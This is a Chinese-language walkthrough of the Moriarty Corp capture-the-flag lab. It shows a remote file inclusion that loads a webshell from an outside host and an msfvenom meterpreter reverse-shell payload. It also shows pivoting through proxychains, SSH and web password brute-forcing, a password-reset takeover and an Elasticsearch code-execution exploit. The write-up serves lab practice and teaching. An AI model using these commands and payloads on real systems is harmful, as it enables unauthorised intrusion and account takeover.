Moriarty Corp靶场一日游

靶场简介

Moriarty Corp靶场环境包含一台外网服务器和三台内网主机,攻击者需先对外网服务器进行web攻击,依据提交flag后的提示信息,逐步获取内网主机权限。本次靶场环境包含以下10个关键部分:

靶场攻略

推荐靶机使用Virtualbox搭建(我是不会告诉你们我VMware翻车了)

信息搜集

利用Nmap进行简单的端口探测

nmap -sn -PR -T 4 192.168.1.0/24
  • -sn:只进行主机发现,不进行端口扫描。

  • -PR:ARP Ping。

  • -T:指定扫描过程使用的时序,总有6个级别(0-5),级别越高,扫描速度越快,在网络通讯状况较好的情况下推荐使用T4。

image-20200501110334057

这里也可以直接使用arp -a

根据靶机说明,开启靶机需要先在靶机8000端口上提交flag{start}开启靶场环境

image-20200502104553594

image-20200502110046688


初步探测

访问靶机80端口,呈现以下页面

image-20200502111050267

访问其中两个博客链接,观察url可发现形式为file=xxx,猜测可能存在路径遍历或者文件包含漏洞

image-20200502111414684

fuzz中……..

还fuzz个屁

image-20200502113035237

尝试文件包含

image-20200502115323304

包含webshell,通过蚁剑连接,连接地址如下

http://192.168.3.53/?file=http://xx.xx.xx.xx/1.txt

通过翻垃圾找到第一个flag

image-20200502115720085

image-20200502115737818

提交flag至8000端口

image-20200502115831491

看到提示目标存在内网信息,内网ip段范围在172.17.0.3-254


内网打点

思路: 先利用msf反弹一个会话,建立一个内网通道再进行下一步的信息搜集

  1. 利用msfvenom生成elf进行反弹shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
  1. 将生成的elf文件上传至目标机器,给与执行权限执行
chmod 777 shell
.elf ./shell.elf
  1. msf开启监听反弹Meterpreter会话

image-20200502173732550

根据之前提示,查看当前网段

image-20200502173806292

利用msf建立路由

run autoroute -s 172.17.0.0/24 25

image-20200503091444686

利用Proxychains工具配置socks5代理

image-20200502174330769

编辑配置文件,添加socks5代理

vim /etc/proxychains.conf

image-20200502174521893


内网渗透

利用上面建立的代理通道配合nmap进行172网段的简单信息搜集

proxychains nmap 172.17.0.0/24 -sV -sT -Pn -T4 -p 80,8080,8000,443

根据探测结果,发现172.17.0.4存在一个web服务

image-20200503101038756

观察页面似乎是个上传点,但好像需要输入相关密码,猜测可能思路是通过爆破获取密码再上传webshell

burp开搞

burp先配置msf生成的socks代理

image-20200503101405961

简单爆破得到密码是passwordPS:还好靶机的密码不是太复杂

直接上传webshell

image-20200503103447619

配置蚁剑代理

image-20200503103548809

翻垃圾,找到第二个flag

image-20200503104345560

提交第二个flag获取进一步提示

image-20200503113841670

image-20200503113723408

根据提示给出了一部分hash,似乎是让我们破解

hash 丢到cmd5,查出结果

image-20200503113920835

回到刚开始,利用nmap进行22端口扫描

proxychains nmap -sV -sT  -Pn -p22 172.17.0.0/24

根据结果得到172.17.0.1172.17.0.12开放了ssh端口

image-20200503131849066

利用之前得到的信息,构建字典,结合proxychainshydra进行ssh弱口令爆破

爆破得到弱口令:用户名:root,密码:weapons

利用第三方ssh工具MobaXterm配置代理进行连接

MobaXterm下载地址:

https://mobaxterm.mobatek.net/

成功连接目标机器

image-20200503132257957

查看flag

image-20200503133018026

提交flag至主目录得到下一步提示

image-20200503133118875

提示我们目标网段存在一个聊天服务器,并给出用户名密码buyer13/arms13,猜测可能是登录聊天服务器

继续用kali探测端口

proxychains nmap 172.17.0.0/24 -sV  -sT  -Pn  -T4 -p443,8000,8080,8888

image-20200503133642932

发现172.17.0.13开放目标端口,输入密码

image-20200503134949879

image-20200503135059609

观察得知存在修改密码功能,猜测可能存在任意用户密码重置

image-20200503140444139

修改admin密码并成功登录查看消息

image-20200503140527481

image-20200503140513666

提交第四个flag至主面板

flag{on_the_move}

image-20200503140650555

根据提示的信息,有个Elasticsearch

Elasticsearch服务通常是运行在9200端口上

继续kali探测服务

proxychains nmap 172.17.0.0/24 -sV  -sT  -Pn  -T4 -p9200

image-20200503140839525

image-20200503140926601

得知版本为4.10.2

利用kali自带的漏洞搜寻功能

image-20200503141154254

发现存在远程代码执行漏洞

攻击成功

image-20200503141401840

获取最后一个flag

image-20200503141434877

提交

image-20200503141504208

如上所述,ip已被拉黑

个人总结

根据之前的信息大概获取到目标的拓扑图

image-20200503142949188

遇到的坑:

  • burp不支持socks4代理,kali建立隧道时注意,可以采用reg等其他代理脚本建立隧道

资源总结